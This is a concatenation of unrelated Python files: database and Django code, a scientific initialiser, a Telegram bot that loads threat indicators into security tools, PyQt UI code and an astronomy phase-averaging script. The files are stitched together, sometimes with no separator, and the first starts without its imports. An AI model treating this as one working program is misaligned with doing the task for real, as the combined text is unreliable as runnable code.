logger = logging.getLogger(__name__)
class Model(object):
    """
    Thin persistence wrapper binding a data dict to a collection
    (presumably an elasticsearch-py style connection — confirm in the
    collection implementation).
    """
    def __init__(self, data, collection):
        self._collection = collection
        self.conn = collection.conn
        # Subclasses override set_defaults/format_data to normalize payloads.
        self.data = self.format_data(self.set_defaults(data))
        self.doc_type = self._collection.doc_type
        self.index = self._collection.index

    def _index(self, **kwargs):
        """Low-level index call; creates when forced or when no id is given."""
        if 'force_new' in kwargs or 'id' not in kwargs:
            kwargs['op_type'] = 'create'
        # bug fix: the original did `del kwargs['force_new']` inside the
        # branch above, which raised KeyError whenever the branch was taken
        # only because 'id' was absent (force_new never passed).
        kwargs.pop('force_new', None)
        kwargs['index'] = self.index
        kwargs['doc_type'] = self.doc_type
        if 'id' not in kwargs:
            # New documents are refreshed so they are immediately searchable.
            kwargs['refresh'] = True
        return self.conn.index(**kwargs)

    def save(self, upsert_params=None, force_new=False, refresh=False):
        """Create the document outright, or upsert keyed on upsert_params."""
        # None default avoids the shared mutable-default-argument pitfall.
        upsert_params = [] if upsert_params is None else upsert_params
        if force_new:
            return self._index(body=self.data, force_new=True, refresh=refresh)
        else:
            return self.upsert(params=upsert_params, refresh=refresh)

    def upsert(self, params=None, refresh=False):
        """Update the document matching params; create it when missing."""
        params = [] if params is None else params
        if params:
            try:
                doc = self._collection.get(params)
                return self._index(body=self.data, id=doc['id'],
                                   refresh=refresh)
            except DoesNotExist:
                logger.info("Did not find doc for " + str(params))
                return self._index(body=self.data, force_new=True,
                                   refresh=refresh)
            except MultipleObjectsReturned:
                # Ambiguous match: refuse to guess which doc to overwrite.
                logger.info("Got more than one object for "+str(params))
                return None
        else:
            return self._index(body=self.data, force_new=True,
                               refresh=refresh)

    def format_data(self, data):
        """Hook: normalize data before storage (identity by default)."""
        return data

    def set_defaults(self, data):
        """Hook: fill default fields (identity by default)."""
        return data
class Item(Model):
    """A stored content item; upserts are keyed on (remoteID, source)."""

    def set_defaults(self, data):
        """Fill license/lifespan/createdAt when absent."""
        defaults = {
            'license': 'unknown',
            'lifespan': 'temporary',
            'createdAt': datetime.now()
        }
        # bug fix: dict.iteritems() is Python-2-only; items() works on 2 and 3.
        for key, val in defaults.items():
            if key not in data:
                data[key] = val
        return data

    def save(self, refresh=False):
        """Save via the base upsert, keyed on the (remoteID, source) pair."""
        upsert_params = [
            {
                'field':'remoteID',
                'value': self.data['remoteID']
            },
            {
                'field': 'source',
                'value': self.data['source']
            }
        ]
        return super(Item, self).save(upsert_params=upsert_params,
                                      refresh=refresh)

    def format_data(self, data):
        """Normalize language, derive summary/searchText, stamp updatedAt."""
        data['updatedAt'] = datetime.now()
        if 'publishedAt' not in data:
            data['publishedAt'] = data['createdAt']
        if 'language' in data and 'code' in data['language']:
            if data['language']['code'] in language_codes.codes:
                # NOTE(review): indexes the language_codes module by code —
                # confirm it supports __getitem__ (the .codes mapping suggests so).
                data['language'] = language_codes[data['language']['code']]
        if 'summary' not in data and 'content' in data:
            # Derive a summary: full content up to 100 chars, else truncate
            # to 97 chars plus an ellipsis.
            if len(data['content']) <= 100:
                data['summary'] = data['content']
            else:
                data['summary'] = data['content'][0:97]+'...'
        # Flat text blob for full-text search: summary + content + tag names.
        search_text = ''
        if 'summary' in data:
            search_text += data['summary']
        if 'content' in data:
            search_text += ' ' + data['content']
        if 'tags' in data:
            tag_text = ' '.join([x['name'] for x in data['tags']])
            search_text += tag_text
        data['searchText'] = search_text
        return data
|
from django.test import TestCase
from django.urls import reverse
from .models import meeting, meetingminutes, resource, event
from .views import newResource, getresources
from django.contrib.auth.models import User
# Tests the 'meeting' model
class MeetingTitleTest(TestCase):
    """Checks the meeting model's str() and db table name."""

    def test_string(self):
        instance = meeting(meetingtitle="Meeting 1")
        self.assertEqual(str(instance), instance.meetingtitle)

    def test_table(self):
        self.assertEqual(str(meeting._meta.db_table), 'title')
# Tests the 'meetingminutes' model
class MeetingMinutesTest(TestCase):
    """Checks the meetingminutes model's str() and db table name."""

    def test_string(self):
        instance = meetingminutes(minutestext="Minutes Text")
        self.assertEqual(str(instance), instance.minutestext)

    def test_table(self):
        self.assertEqual(str(meetingminutes._meta.db_table), 'meetingminutes')
# Tests the 'resource' model
class ResourceTest(TestCase):
    """Checks the resource model's str() and db table name."""

    def test_string(self):
        instance = resource(resourcename="Resource 1")
        self.assertEqual(str(instance), instance.resourcename)

    def test_table(self):
        self.assertEqual(str(resource._meta.db_table), 'resource')
# Tests the 'event' model
class EventTest(TestCase):
    """Checks the event model's str() and db table name."""

    def test_string(self):
        instance = event(eventtitle="Event 1")
        self.assertEqual(str(instance), instance.eventtitle)

    def test_table(self):
        self.assertEqual(str(event._meta.db_table), 'event')
# Tests a logged in user can access the Resource form
class ResourceFormTest(TestCase):
    """Verifies that a logged-in user can reach the new-resource form."""

    def test_view(self):
        self.test_user = User.objects.create_user(username='testuser1', password='P@ssw0rd1')
        logged_in = self.client.login(username='testuser1', password='P@ssw0rd1')
        response = self.client.get(reverse('newresource'))
        self.assertEqual(str(response.context['user']), 'testuser1')
        self.assertEqual(response.status_code, 200)  # view reachable
        self.assertTemplateUsed(response, 'pythonclubapp/newresource.html')  # correct template
#! /usr/bin/env python
#__________________________________________________
# pyLorenz/utils/initialisation/
# gaussianindependantinitialiser.py
#__________________________________________________
# author : colonel
# last modified : 2016/10/9
#__________________________________________________
#
# class to handle an initialiser
#
import numpy as np
from ..random.independantgaussianrng import IndependantGaussianRNG
#__________________________________________________
class GaussianIndependantInitialiser(object):
    """Initialises the truth state and perturbed samples around it."""
    #_________________________
    def __init__(self, t_truth = None, t_eg = None):
        # bug fix: the original defaults (np.zeros(0) / IndependantGaussianRNG())
        # were evaluated once at import time and shared by every instance —
        # the classic mutable-default-argument pitfall. None sentinels build
        # fresh defaults per call instead.
        if t_truth is None:
            t_truth = np.zeros(0)
        if t_eg is None:
            t_eg = IndependantGaussianRNG()
        self.setGaussianIndependantInitialiserParameters(t_truth, t_eg)
    #_________________________
    def setGaussianIndependantInitialiserParameters(self, t_truth = None, t_eg = None):
        if t_truth is None:
            t_truth = np.zeros(0)
        if t_eg is None:
            t_eg = IndependantGaussianRNG()
        # truth
        self.m_truth = t_truth
        # error generator
        self.m_errorGenerator = t_eg
    #_________________________
    def initialiseTruth(self):
        """Return an independent copy of the truth state."""
        return np.copy(self.m_truth)
    #_________________________
    def initialiseSamples(self, t_Ns):
        """Return t_Ns samples: truth plus noise from the error generator."""
        return self.m_truth + self.m_errorGenerator.drawSamples(t_Ns, 0)
#__________________________________________________
|
import os
dirname = os.path.dirname(__file__)
class File_Locations:
    # All paths are resolved relative to this module's directory.
    # NOTE(review): some paths use "data/..." and others "../data/..." —
    # confirm this inconsistency is intentional (package layout dependent).
    local_data_directory = os.path.join(dirname,"data")
    """
    Available from https://www.neighborhoodatlas.medicine.wisc.edu/
    """
    adi_location = os.path.join(dirname,"data/adi/US_blockgroup_15.txt")
    """
    Available from cps.ipums.org
    Current variables:
        LABFORCE
        EMPSTAT
        AGE
        EDUC
        INCWAGE
        STATEFIP
        CPI99
        INCTOT
        (ASECWT is included automatically)
    """
    cps_toplevel_extract = os.path.join(dirname,"../data/cps/cps_00027.csv")
    """
    Local files
    """
    mincer_model_location = os.path.join(dirname,"../data/models/mincer.pickle")
    mincer_params_location = os.path.join(dirname, "data/mincer_params.pickle")
    cpi_adjustments_location = os.path.join(dirname, "data/bls/cpi_adjustment_range.csv")
    mean_wages_location = os.path.join(dirname, "data/mean_wages.csv")
    hs_mean_wages_location = os.path.join(dirname, "data/hs_grads_mean_wages.csv")
    bls_employment_location = os.path.join(dirname, "data/bls/bls_employment_series.csv")
    bls_laborforce_location = os.path.join(dirname, "data/bls/bls_laborforce_series.csv")
    bls_employment_rate_location = os.path.join(dirname, "data/bls/bls_employment_rate_series.csv")
    bls_wage_location = os.path.join(dirname, "data/bls/bls_wage_series.csv")
class Defaults:
    # Minimum sample size for a demographic group to be reported.
    min_group_size = 30
class General:
    # Age bucket labels used when grouping CPS respondents.
    CPS_Age_Groups = ['18 and under','19-25','26-34','35-54','55-64','65+']
# -*- coding: utf-8 -*-
"""
Copyright (c) Dario Götz and Jörg Christian Reiher.
All rights reserved.
"""
import threading
import datetime
from keys import *
from config import Config
# Per-module configuration handle — presumably resolves judging settings
# by module name; confirm in config.py.
_CONFIG = Config(__name__)
class JudgingManager(object):
    '''
    Provides the judging management responsible for keeping track of
    which judge requests to judge which heat.

    Thread-safe via an RLock. A request's expiry date may be None,
    meaning the request never expires.
    '''
    def __init__(self):
        self._lock = threading.RLock()
        # heat_id -> {judge_id: expire_date or None}
        self.__judging_requests = {}

    def expire_judging_requests(self):
        """Drop every request whose expiry date has passed."""
        with self._lock:
            now = datetime.datetime.now()
            for heat_id, reqs in self.__judging_requests.items():
                # Iterate a snapshot: deleting from `reqs` while iterating
                # its live items() view raises RuntimeError on Python 3.
                for judge_id, expire_date in list(reqs.items()):
                    # bug fix: expire_date is None for non-expiring requests;
                    # the old `expire_date < now` deleted them on Python 2
                    # (None sorts below everything) and raises TypeError on 3.
                    if expire_date is not None and expire_date < now:
                        del reqs[judge_id]
        return

    def register_judging_request(self, judge_id, heat_id, expire_s=None):
        """Register judge_id for heat_id, optionally expiring after expire_s seconds."""
        if expire_s:
            expire_date = datetime.datetime.now() + datetime.timedelta(seconds=expire_s)
        else:
            expire_date = None
        with self._lock:
            self.__judging_requests.setdefault(heat_id, {})[judge_id] = expire_date
        return True

    def unregister_judging_request(self, judge_id, heat_id):
        """Remove a request; returns False when it was not registered."""
        with self._lock:
            try:
                del self.__judging_requests[heat_id][judge_id]
            except KeyError:  # narrowed from a bare except
                print('judging_manager: Cannot unregister judging request for Heat {} by {}'.format(heat_id, judge_id))
                return False
        return True

    def get_judging_requests(self, heat_id):
        """Return a copy of the non-expired requests for heat_id."""
        self.expire_judging_requests()
        res = {}
        res.update(self.__judging_requests.get(heat_id, {}))
        return res
|
"""Base classes."""
from jupyter_server.extension.handler import ExtensionHandlerMixin
class TerminalsMixin(ExtensionHandlerMixin):
    """An extension mixin for terminals."""
    @property
    def terminal_manager(self):
        # The manager is injected into the application settings by the
        # terminals extension at startup; raises KeyError when absent.
        return self.settings["terminal_manager"]  # type:ignore[attr-defined]
|
from telegram.ext import Updater, CommandHandler, ConversationHandler,CallbackQueryHandler,MessageHandler, Filters
from telegram import InlineKeyboardMarkup,InlineKeyboardButton
import yaml, logging, os
import extract
import pdf_to_text
import telegram
# Conversation states for the text-based /ioc flow.
INPUT_TEXT,INPUT_TEXT_C = range(2)
# Buffer holding the most recent IoC text (typed or extracted from a pdf).
text = ""
# Conversation states for the /pdf flow.
INPUT_PDF, INPUT_PDF_C = range(2)
# Placeholder — "ACA PONES TU CHAT ID" is Spanish for "put your chat id
# here"; the module will not import until this is replaced with a real id.
GRUPO = ACA_PONES_TU_CHAT_ID
def start(update, context):
    """Handle /start: greet the user and list the available commands."""
    # Ignore anything coming from outside the configured group chat.
    if update.message.chat.id != GRUPO:
        return
    logger.info('He recibido un comando start')
    update.message.reply_text('¡Bienvenido a nBot %s!. Opciones disponibles: \
    \n/ioc - Cargar indicadores modo texto. \
    \n/pdf - Cargar indicadores pdf [Beta]. \
    \n' % update.message.from_user.name)
def ioc(update, context):
    """Handle /ioc: prompt for the IoC text and enter the INPUT_TEXT state."""
    if update.message.chat.id != GRUPO:
        return
    update.message.reply_text('Bueno %s, pasame el mensaje asi lo parseo (acordate de anteponer \'/ioc\' al texto)!' % update.message.from_user.name)
    return INPUT_TEXT
def pdf(update, context):
    """Handle /pdf: prompt for the pdf document and enter the INPUT_PDF state."""
    if update.message.chat.id != GRUPO:
        return
    update.message.reply_text('Bueno %s, pasame el documento pdf asi lo parseo!' % update.message.from_user.name)
    return INPUT_PDF
def get_destination_path(path, file_url):
    """
    Build the pair (download_path, pdf_path) for file_url inside path:
    the original basename, and the same basename with a .pdf extension.
    """
    base = os.path.basename(file_url)
    stem, _ext = os.path.splitext(base)
    down_file = os.path.join(path, base)
    new_file = os.path.join(path, stem) + '.pdf'
    return down_file, new_file
def check_document(file_name):
    """Return True when the supplied file name carries a '.pdf' suffix."""
    is_pdf = file_name.endswith('.pdf')
    return is_pdf
def document_saver(update,context):
    """Download a .pdf attachment, extract its text and preview the IoC found."""
    if(update.message.chat.id!=GRUPO): return
    global text
    if update.message.document and check_document(update.message.document.file_name):
        doc_file = context.bot.get_file(update.message.document.file_id)
        my_path = os.path.abspath(os.path.dirname(__file__))
        down, new = get_destination_path(my_path, update.message.document.file_name)
        doc = doc_file.download(down)
        # Extract the plain text, then remove the downloaded file.
        text=pdf_to_text.convertir(doc)
        if os.path.exists(doc):
            os.remove(doc)
        cantidad = extract.contar(text)
        # 0 IoC: report failure; 1-25: list them inline; >25: report the count only.
        if(cantidad==0):
            update.message.reply_text('%s, no encuentro IoC válidos en el documento %s. Recordá que solo acepto SHA1, IPs públicas y dominios' % (update.message.from_user.name, update.message.document.file_name))
        if(cantidad>0 and cantidad <= 25):
            update.message.reply_text('Se recibieron los IoC de %s, procederé a cargar en nuestras soluciones lo siguiente:\n%s\n ¿Confirmar? /si - /no' % (update.message.document.file_name, extract.buscar(text)))
        if(cantidad >25):
            update.message.reply_text('Se recibieron %i IoC (no puedo listar en este chat esta cantidad) de %s, procederé a cargarlos en nuestras soluciones de seguridad. \n ¿Confirmar? /si - /no' % (cantidad, update.message.document.file_name))
        if(cantidad>0):
            # Wait for /si or /no confirmation.
            return INPUT_PDF_C
    return ConversationHandler.END
def confirmar(update,context):
    """Confirm (/si) or cancel (/no) loading the IoC extracted from a pdf."""
    if(update.message.chat.id!=GRUPO): return
    global text
    if(update.message.text=="/si"):
        # NOTE(review): extract.extraer runs even though the reply says pdf
        # loading is not yet authorized — confirm whether this is intended.
        extract.extraer(text)
        #update.message.reply_text('%s, confirmado, se cargaron!' % update.message.from_user.name)
        update.message.reply_text('%s, entiendo tu confirmación, pero aun no estoy autorizado a cargar IoC de pdfs!' % update.message.from_user.name)
    if(update.message.text=="/no"):
        update.message.reply_text('%s, se anulo la carga!' % update.message.from_user.name)
    # Clear the shared buffer and end the conversation either way.
    text=""
    return ConversationHandler.END
def confirmar_ioc(update,context):
    """Confirm (/si) or cancel (/no) loading the text-based IoC."""
    if(update.message.chat.id!=GRUPO): return
    global text
    if(update.message.text=="/si"):
        extract.extraer(text)
        #update.message.reply_text('%s, confirmado, se cargaron!' % update.message.from_user.name)
        update.message.reply_text('%s, confirmado, se cargaron los IoC' % update.message.from_user.name)
    if(update.message.text=="/no"):
        print()
        update.message.reply_text('%s, se anulo la carga!' % update.message.from_user.name)
    # Clear the shared buffer and end the conversation either way.
    text=""
    return ConversationHandler.END
def updateIoc(update, context):
    """Parse the received text for IoC and ask for confirmation via buttons."""
    if(update.message.chat.id!=GRUPO): return
    global text
    text = update.message.text
    if(extract.buscar(text) != ""):
        # Inline SI/NO keyboard; answers arrive in confirmar_ioc_button.
        buttonSI = InlineKeyboardButton (
            text='SI',
            callback_data='SI'
        )
        buttonNO = InlineKeyboardButton (
            text='NO',
            callback_data='NO'
        )
        update.message.reply_text('Se recibieron los IoC, procederé a cargar en nuestras soluciones lo siguiente:\n%s\n ¿Confirmar?' % extract.buscar(text),reply_markup=InlineKeyboardMarkup([
            [buttonSI,buttonNO]
        ]))
    else:
        update.message.reply_text('No encuentro IoC válidos en tu mensaje %s. Recordá que solo acepto SHA1, IPs públicas y dominios' % update.message.from_user.name)
        return ConversationHandler.END
    return INPUT_TEXT_C
def confirmar_ioc_button(update,context):
    """Callback-query handler for the inline SI/NO confirmation buttons.

    On SI the buffered text is passed to ``extract.extraer``; on NO the
    load is discarded. The shared ``text`` buffer is cleared and the
    conversation ends.
    """
    # Ignore callbacks not coming from the configured group chat.
    if(update.callback_query.message.chat.id!=GRUPO): return
    global text
    # (removed a leftover `print(update)` debug statement that dumped the
    # whole Update object -- including user data -- to stdout)
    if(update.callback_query.data=='SI'):
        extract.extraer(text)
        update.callback_query.message.reply_text('%s, confirmado, se cargaron!' %update.callback_query.message.chat.first_name)
    if(update.callback_query.data=='NO'):
        update.callback_query.message.reply_text('%s, se anulo la carga!' % update.callback_query.message.chat.first_name)
    # Clear the shared buffer regardless of the answer.
    text=""
    return ConversationHandler.END
if __name__ == '__main__':
    # Basic console logging for the bot process.
    logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
    logger = logging.getLogger('nAutomaticBot')
    """ Llave API para conectarse a Telegram """
    # Telegram API token (placeholder -- supply the real bot token here).
    updater = Updater(token="YOUR_BOT_TOKEN", use_context=True)
    dp = updater.dispatcher
    """ Handler's """
    dp.add_handler(CommandHandler('start', start))
    # Conversation 1: /ioc -> free-text IoCs -> inline-button confirmation.
    dp.add_handler(ConversationHandler(
        entry_points=[
            CommandHandler('ioc', ioc)
        ],
        states={
            INPUT_TEXT: [MessageHandler(Filters.text, updateIoc)],
            INPUT_TEXT_C: [CallbackQueryHandler(callback=confirmar_ioc_button)]
        },
        fallbacks=[]
    ))
    # Conversation 2: /pdf -> document upload -> /si - /no confirmation.
    dp.add_handler(ConversationHandler(
        entry_points=[
            CommandHandler('pdf', pdf)
        ],
        states={
            INPUT_PDF: [MessageHandler(Filters.document, document_saver)],
            INPUT_PDF_C: [MessageHandler(Filters.command, confirmar)]
        },
        fallbacks=[]
    ))
    # Long-poll Telegram until the process is interrupted.
    updater.start_polling()
    updater.idle()
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'stylesheets.ui'
#
# by: PyQt4 UI code generator 4.5.4
#
# WARNING! All changes made in this file will be lost!
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import object
from PyQt4 import QtCore, QtGui
class Ui_Form(object):
    """pyuic4-generated UI class for ``stylesheets.ui``.

    Two list widgets ("System StyleSheets" / "Custom StyleSheets") with
    tool buttons to add, remove and reorder custom stylesheets. Do not
    edit by hand: regenerating from the .ui file overwrites this class.
    """
    def setupUi(self, Form):
        """Build the widget tree on *Form* and wire the selection signals."""
        Form.setObjectName("Form")
        Form.resize(619, 451)
        self.horizontalLayout_2 = QtGui.QHBoxLayout(Form)
        self.horizontalLayout_2.setMargin(0)
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        # Left column: label + multi-select list of system stylesheets.
        self.verticalLayout_2 = QtGui.QVBoxLayout()
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.label_2 = QtGui.QLabel(Form)
        self.label_2.setObjectName("label_2")
        self.verticalLayout_2.addWidget(self.label_2)
        self.system = QtGui.QListWidget(Form)
        self.system.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)
        self.system.setTextElideMode(QtCore.Qt.ElideMiddle)
        self.system.setObjectName("system")
        self.verticalLayout_2.addWidget(self.system)
        self.horizontalLayout_2.addLayout(self.verticalLayout_2)
        # Arrow button that copies a system stylesheet to the custom list.
        self.addFromSystem = QtGui.QToolButton(Form)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(":/icons/next.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.addFromSystem.setIcon(icon)
        self.addFromSystem.setObjectName("addFromSystem")
        self.horizontalLayout_2.addWidget(self.addFromSystem)
        # Right column: toolbar (add/remove/up/down) above the custom list.
        self.verticalLayout = QtGui.QVBoxLayout()
        self.verticalLayout.setObjectName("verticalLayout")
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.label = QtGui.QLabel(Form)
        self.label.setObjectName("label")
        self.horizontalLayout.addWidget(self.label)
        spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        self.addFromFile = QtGui.QToolButton(Form)
        icon1 = QtGui.QIcon()
        icon1.addPixmap(QtGui.QPixmap(":/icons/new.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.addFromFile.setIcon(icon1)
        self.addFromFile.setObjectName("addFromFile")
        self.horizontalLayout.addWidget(self.addFromFile)
        self.remove = QtGui.QToolButton(Form)
        icon2 = QtGui.QIcon()
        icon2.addPixmap(QtGui.QPixmap(":/icons/close.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.remove.setIcon(icon2)
        self.remove.setObjectName("remove")
        self.horizontalLayout.addWidget(self.remove)
        self.up = QtGui.QToolButton(Form)
        icon3 = QtGui.QIcon()
        icon3.addPixmap(QtGui.QPixmap(":/icons/up.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.up.setIcon(icon3)
        self.up.setObjectName("up")
        self.horizontalLayout.addWidget(self.up)
        self.down = QtGui.QToolButton(Form)
        icon4 = QtGui.QIcon()
        icon4.addPixmap(QtGui.QPixmap(":/icons/down.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.down.setIcon(icon4)
        self.down.setObjectName("down")
        self.horizontalLayout.addWidget(self.down)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.custom = QtGui.QListWidget(Form)
        self.custom.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
        self.custom.setTextElideMode(QtCore.Qt.ElideMiddle)
        self.custom.setObjectName("custom")
        self.verticalLayout.addWidget(self.custom)
        self.horizontalLayout_2.addLayout(self.verticalLayout)
        self.retranslateUi(Form)
        # Any selection change in either list re-applies the stylesheet(s).
        QtCore.QObject.connect(self.system, QtCore.SIGNAL("itemSelectionChanged()"), Form.applyChanges)
        QtCore.QObject.connect(self.custom, QtCore.SIGNAL("itemSelectionChanged()"), Form.applyChanges)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set all user-visible (translatable) strings on the widgets."""
        Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
        self.label_2.setText(QtGui.QApplication.translate("Form", "System StyleSheets:", None, QtGui.QApplication.UnicodeUTF8))
        self.addFromSystem.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate("Form", "Custom StyleSheets:", None, QtGui.QApplication.UnicodeUTF8))
        self.addFromFile.setToolTip(QtGui.QApplication.translate("Form", "Add another stylesheet", None, QtGui.QApplication.UnicodeUTF8))
        self.addFromFile.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
        self.remove.setToolTip(QtGui.QApplication.translate("Form", "Remove selected stylesheet", None, QtGui.QApplication.UnicodeUTF8))
        self.remove.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
        self.up.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
        self.down.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
import icons_rc
if __name__ == "__main__":
    # Stand-alone preview: show the generated form in its own window.
    import sys
    app = QtGui.QApplication(sys.argv)
    Form = QtGui.QWidget()
    ui = Ui_Form()
    ui.setupUi(Form)
    Form.show()
    sys.exit(app.exec_())
|
from django.urls import path
from vkrb.text.views import TextGetView
# URL namespace for {% url 'text:...' %} reversing.
app_name = 'text'
urlpatterns = [
    # GET endpoint served by the class-based TextGetView.
    path('get/', TextGetView.as_view()),
]
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 11:20:38 2018
@author: mtech
"""
"""
This programme (should) takes the raw data, sorts it into baselines, averages for repeated data,
undoes the mod 2pi, calculates an array where data needs predicting and prints to a file
for use in a george library process
"""
import numpy as np
import cmath
import matplotlib.pyplot as plt
#import george
#from george import kernels
# import scipy.optimize as op
#function to read in data
def readfile(filename):
    """Read raw visibility data from *filename* and keep calibration rows.

    Each line is comma-separated:
    ``time, antenna1, antenna2, vis, visuncert, num, flag``.
    Only rows that are unflagged (some field contains ``"False"``) AND are
    calibration data (``num == '2'``) are kept.

    Returns a tuple ``(timestamp, antenna1, antenna2, vis, visuncert, num,
    flag, phs)`` where all but ``flag`` (a list of raw strings) are numpy
    arrays; ``vis`` is complex and ``phs`` is its phase in radians.
    """
    timestamp, antenna1, antenna2, vis, visuncert, num, flag = ([] for _ in range(7))
    # 'with' guarantees the handle is closed even on error; the original
    # opened the file and never closed it (resource leak).
    with open(filename, 'r') as filedata:
        for line in filedata:
            items = line.split(',')  # fields are comma-separated
            # only take unflagged data (tagged as "False") that is also
            # calibration data (num == '2')
            if any("False" in x for x in items) and (items[5] == '2'):
                timestamp.append(float(items[0]))
                antenna1.append(float(items[1]))
                antenna2.append(float(items[2]))
                vis.append(complex(items[3]))   # visibility is complex
                visuncert.append(float(items[4]))
                num.append(float(items[5]))
                flag.append(str(items[6]))      # flag stays a raw string
    # Convert to numpy arrays (flag intentionally stays a list, matching
    # the original interface).
    timestamp = np.array(timestamp)
    antenna1 = np.array(antenna1)
    antenna2 = np.array(antenna2)
    vis = np.array(vis)
    visuncert = np.array(visuncert)
    num = np.array(num)
    # Phase of each complex visibility.
    phs = np.array([cmath.phase(v) for v in vis])
    return timestamp, antenna1, antenna2, vis, visuncert, num, flag, phs
#********************************************************************************************
#Main: read raw data, tag every row with a unique baseline id and split by baseline.
#PARAMETERS TO BE CHANGED:
#CAN CHANGE the i in range 0, len(baselineArrays) in the loop below to change which baselines to process/plot
# Threshold: a jump of this size between consecutive phases is treated as a
# mod-2pi wrap-around.
phaseDiff = cmath.pi #value that the difference between two phases has to be equal to for the programme to have considered data to have wrapped-around on itself
#Read the raw (time, antenna, visibility, ...) data from disk.
timestamp, antenna1, antenna2, vis, visuncert, num, flag, phs = readfile('A75_data.dat')
#Identify baselines and sort data based on baselines.
#Each antenna pair is mapped to a unique number via the Cantor pairing
#function (a+b)(a+b+1)/2 + b.
baselines = ((antenna1 + antenna2)*(antenna1 + antenna2 +1))/2 + antenna2
#Stack baseline id, time and phase as columns so rows sort together.
allThree = np.column_stack((baselines,timestamp, phs))
#sort rows by the baseline id in the first column
allThreeSorted = sorted(allThree,key=lambda x: x[0])
#sorted() returned a list of rows; back to a numpy array
allThreeSorted = np.array(allThreeSorted)
#Split into one sub-array per baseline: cut wherever the (sorted) baseline
#id changes between consecutive rows.
baselineArrays=np.split(allThreeSorted, np.where(np.diff(allThreeSorted[:,0]))[0]+1) #split the arrays by when theres a difference in the baseline number
#**********************************************************************************************************
#For every baseline: average phases over repeated timestamps (with a crude
#wrap-around correction), plot, and write a "<i>datafile.txt" per baseline.
for i in range (0, len(baselineArrays)): #set max to len(baselineArrays) to go to end
    #Select a single baseline worth of data for each i in loop
    oneBaselineArray = baselineArrays[i]
    t=[] #create blank arrays for time and phase
    p=[]
    for n in range (0,len(oneBaselineArray)):
        t.append(oneBaselineArray[n,1]) #fill up time array from 2nd column of this baselines data array
        p.append(oneBaselineArray[n,2]) #fill up phase array from 3rd column of this baselines data array
    #Convert to numpy arrays
    t = np.array(t)
    p = np.array(p)
    """
    #Plot these if you want
    plt.figure()
    plt.scatter(t, p)
    plt.show()
    """
    #Average over values for repeated times
    # Now average over repeated times...
    # Averaging might have a problem if the two values are ~-pi and pi
    #Identify values, location and occurences of each particular timestamp
    times, indicies, inverse, occurences = np.unique(t, return_index=True , return_inverse=True, return_counts=True)
    phaseAv = []
    #Loop over every unique time
    for k in range(0,len(times)):
        temp = 0
        #If the time is repeated, average over all corresponding values
        # if occurences[i] != 1:
        #Indices of every sample sharing this unique timestamp
        index = np.asarray(np.where(inverse == inverse[k])) #find values, convert to array
        #Loop from zero to the number of ocurences
        for j in range(0,len(index.T)):
            #Check if there has been a wrap-around in the data - if gap between datas is too large (STOPS PHASES AVERAGING TO ROUGHLY ZERO)
            # NOTE(review): at j == 0 the j-1 term indexes index[0][-1] (the
            # LAST occurrence) via Python's negative indexing -- confirm this
            # wrap comparison is intended for the first sample.
            if (p[index[0][j]] - p[index[0][j-1]] > phaseDiff or - p[index[0][j]] + p[index[0][j-1]] > phaseDiff ):
                #if wrapped arround then add on 2pi before summing
                p[index[0][j-1]] = p[index[0][j-1]] + 2*cmath.pi
                temp += p[index[0][j]]
            else:
                #If there is no wraparound in the data sum phase values ready for averaging
                temp += p[index[0][j]]
        #Add averaged phase values to array
        #if the value has come out as bigger than pi then need to wrap it back around
        if (temp/len(index.T) > cmath.pi):
            av = temp/len(index.T) - 2*cmath.pi
        #If the value is reasonable then calculate average as normal
        else:
            av = temp/len(index.T)
        #Add averages to an array
        phaseAv.append(av)
    #Scatter-plot the averaged phase against time for this baseline.
    plt.figure()
    plt.scatter(times, phaseAv)
    plt.show()
    #Output the data in a form to be used by the GP programme
    #Stitch together data arrays and transpose to columns
    data = np.array([times, phaseAv])
    data = data.T
    #Open a .txt file to write to
    #format(i) makes a different file for each baseline thats being looped over
    with open("{}datafile.txt".format(i), 'wb+') as datafile_id:
        #Write the data, formatted and separated by a comma
        np.savetxt(datafile_id, data, fmt=['%.2f','%.2f'], delimiter=',')
#"""
#PARAMETERS TO CHANGE
#standardWrapCheck = 2/3
#timeGap = 200
#fillTimeGap = 1.7
#gapWrapCheck = cmath.pi/2
#sampleRate = 0.86
# #Now undo mod 2pi and work out where to put new datapoint estimates (both in one loop for efficiency)
# #TO DO - Work out an average gradient of the graph?
# #For now, hard code some stuff in
# gap =[]
# #If consecutive datapoints are more than ~2pi apart then add 2pi to all consecutive datapoints
# for i in range(0, len(tAv) - 1): #Loop over entire dataset
# #Check for discontinuity - if phs gap is big then discont
# #If big time gap with little increase then time gap
# if pAv[i+1] - pAv[i] > standardWrapCheck*cmath.pi or tAv[i+1] - tAv[i] > timeGap and pAv[i+1] - pAv[i] < gapWrapCheck :
